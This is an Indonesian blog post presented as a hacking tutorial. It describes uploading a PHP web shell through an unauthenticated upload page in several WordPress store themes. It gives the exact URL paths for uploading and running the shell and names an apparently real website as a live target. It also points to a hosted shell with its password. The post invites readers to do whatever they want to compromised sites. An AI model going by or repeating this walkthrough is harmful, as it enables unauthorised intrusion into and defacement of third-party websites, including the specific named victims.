kita dapat meng-upload backdoor dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /UPLOAD di target tersebut...
http://www.target.com/wp-content/themes/Wpstore/upload
selanjutnya akan muncul file upload,sekarang kita upload shell kesayangan.... klo udah di upload, tinggal eksekusi shell kita... caranya : http://www.target.com/wp-content/uploads/products_img/namashell.php
selesai dehhh..... sekrang terserah mau di apain tuh sitenya... :D
klo msih bngung, sya ksih live targetnya...http://www.davidsteele.com/wp-content/themes/WPStore/upload/
tinggal upload shell..... klo nt blm pnya shell bsa pke pnya sya..
http://faithinmodernsteel.com/
..passwrd di isi : kerinci
source om Farid Ingin Belajar
Semoga bermanfaat dan selamat mencoba..
Saatnya berkata "HamdallAh"
efefe
BalasHapus